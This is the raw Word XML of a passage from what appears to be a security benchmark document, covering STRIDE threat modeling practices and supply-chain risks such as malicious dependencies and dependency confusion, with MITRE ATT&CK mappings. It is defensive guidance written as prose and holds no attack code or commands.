    <w:p w14:paraId="4E0ACDEC" w14:textId="1294DAD8" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Late architectural flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FAADD6" w14:textId="1C844330" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unidentified attack surfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C81333" w14:textId="74812B8F" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insufficient security controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1061D21A" w14:textId="15222A09" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Missing or inadequate security controls (encryption, authentication, authorization, audit logging) result from incomplete threat analysis, creating exploitable gaps in defense-in-depth strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03251BC9" w14:textId="77777777" w:rsidR="00932382" w:rsidRPr="00E53977" w:rsidRDefault="00932382" w:rsidP="00932382">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC6BCB7" w14:textId="53AC9D58" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Compliance blind spots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A0806D" w14:textId="05C4493D" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security debt accumulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487822BF" w14:textId="171B2D65" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C87B8" w14:textId="136DFC03" w:rsidR="00393833" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE200B8" w14:textId="6EBBC677" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>exploit public-facing application (T1190) leveraging architectural flaws in authentication, session management, or input validation that threat modeling would identify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753CADDD" w14:textId="2C7B462F" w:rsidR="00393833" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BA60B" w14:textId="28D4E27B" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>abuse elevation control mechanism (T1548) exploiting insufficient privilege separation or missing authorization checks in system architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4A9A97" w14:textId="41864CB8" w:rsidR="00393833" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C105F3C" w14:textId="64E0E70B" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>impair defenses (T1562) exploiting missing audit logging, monitoring gaps, or insufficient security telemetry designed into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABCD4D5" w14:textId="77B3A9FD" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833" w:rsidP="00393833">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DS-1.1: Implement STRIDE-based threat modeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3CEA0" w14:textId="2F30003D" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="216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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish systematic STRIDE methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC813D2" w14:textId="7ADC3675" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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629C3CCD" w14:textId="3AC7D259" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use structured threat modeling tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A21746A" w14:textId="02FCE324" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>flows, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> generates actionable mitigation recommendations with associated security controls. Store threat </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>models as versioned artifacts in source control alongside architecture documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD24050" w14:textId="7360D6D7" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate into development workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB72AA8" w14:textId="277CB52E" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Integrate threat modeling outputs directly into development workflows by exporting identified threats to Azure DevOps work items with clear ownership, priority, and acceptance criteria. Implement architecture review gates that require completed threat models before design approval and establish pull request checks that trigger threat model reviews when architectural changes are detected. This ensures threat analysis remains synchronized with system evolution throughout the development of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>lifecycle</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED43639" w14:textId="15099272" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409" w:rsidP="00634409">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DS-1.2: Automate threat analysis integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B3B55F" w14:textId="4A1D1F2C" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Scaling threat modeling across large organizations requires automation and distributed capability to prevent security reviews from becoming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>development bottlenecks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19658188" w14:textId="7720AFA0" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Scale through automation and enablement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0B2D07" w14:textId="05B9F2D9" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Build distributed capability with security champions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B499D" w14:textId="02EA7B10" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Establish a Security Champions program to build distributed threat modeling capability within development teams. Train champions on STRIDE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>methodology,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> provide them with threat modeling tools and templates, and empower them to facilitate threat modeling sessions for their teams. Security champions serve as the first line of review, escalating complex scenarios to centralized security teams while enabling most threat modeling to occur without bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660CDF18" w14:textId="77777777" w:rsidR="00932382" w:rsidRPr="00E53977" w:rsidRDefault="00932382" w:rsidP="00932382">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579DAC54" w14:textId="43F22757" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Automated threat analysis implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CCDF03" w14:textId="486AE8AD" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Questionnaire-based assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE87BA" w14:textId="0563291B" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Standardized security questionnaires integrated into Azure DevOps templates for consistent threat identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71517117" w14:textId="5B2D1E9A" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security champions program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C1657" w14:textId="1F997E34" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Designated security champions in each development team trained on threat modeling facilitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E6AC7D" w14:textId="1D670D61" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Architecture review automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D3FF4" w14:textId="43D5E97A" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Automated checks in pull requests for architecture diagram updates requiring threat model reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E33307" w14:textId="75530C63" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Threat model as code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55941879" w14:textId="70141C98" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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101" w:name="_Toc242449564"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>DS-2: Secure the software supply chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="7A798D05" w14:textId="48EC1193" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E707DC7" w14:textId="4614D9EB" w:rsidR="00634409" w:rsidRPr="00E53977" w:rsidRDefault="00634409">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00484299" w14:textId="197411AE" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Malicious dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F516C6F" w14:textId="1499DA90" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t> Adversaries inject backdoors into popular open-source libraries (SolarWinds-style attacks) or create typos</w:t>
      </w:r>
      <w:r w:rsidR="00932382" w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>quatted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> packages that execute malicious code during installation or runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFB2FB" w14:textId="790966F1" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Vulnerable third-party libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379EBEC2" w14:textId="48EC3055" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Compromised build artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8ECE9" w14:textId="3B203249" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Attackers tamper with compiled binaries, container images, or deployment packages during storage or transit, injecting malware that bypasses source code review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7984C3BF" w14:textId="0C5733FF" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Dependency confusion attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF13D6" w14:textId="3CFC19F8" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Transitive dependency risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE71D55" w14:textId="5DE6C5AD" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Vulnerabilities in indirect dependencies (dependencies of dependencies) remain invisible without deep dependency tree analysis and SBOM generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E488C5A" w14:textId="58ACF013" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of provenance verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12149D5D" w14:textId="00548164" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Absence of cryptographic verification enables package substitution attacks where legitimate packages are replaced with malicious versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB6A4F" w14:textId="0FED4A4A" w:rsidR="000D3DB7" w:rsidRPr="00E53977" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641EBAE6" w14:textId="0C2D0854" w:rsidR="000D3DB7" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EA70E7" w14:textId="7E76F936" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>supply chain compromise (T1195.001) through compromise of software dependencies and development tools to gain initial foothold in target environments, and trusted relationship (T1199) exploiting trust between organizations and third-party software vendors to deliver malicious updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955908B" w14:textId="76318D84" w:rsidR="000D3DB7" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1F6AF" w14:textId="56D726BA" w:rsidR="00EC40F9" w:rsidRPr="00E53977" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>command and scripting interpreter (T1059) executing malicious code embedded in dependency installation scripts or post-install hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD236B" w14:textId="68011513" w:rsidR="000D3DB7" w:rsidRDefault="000D3DB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
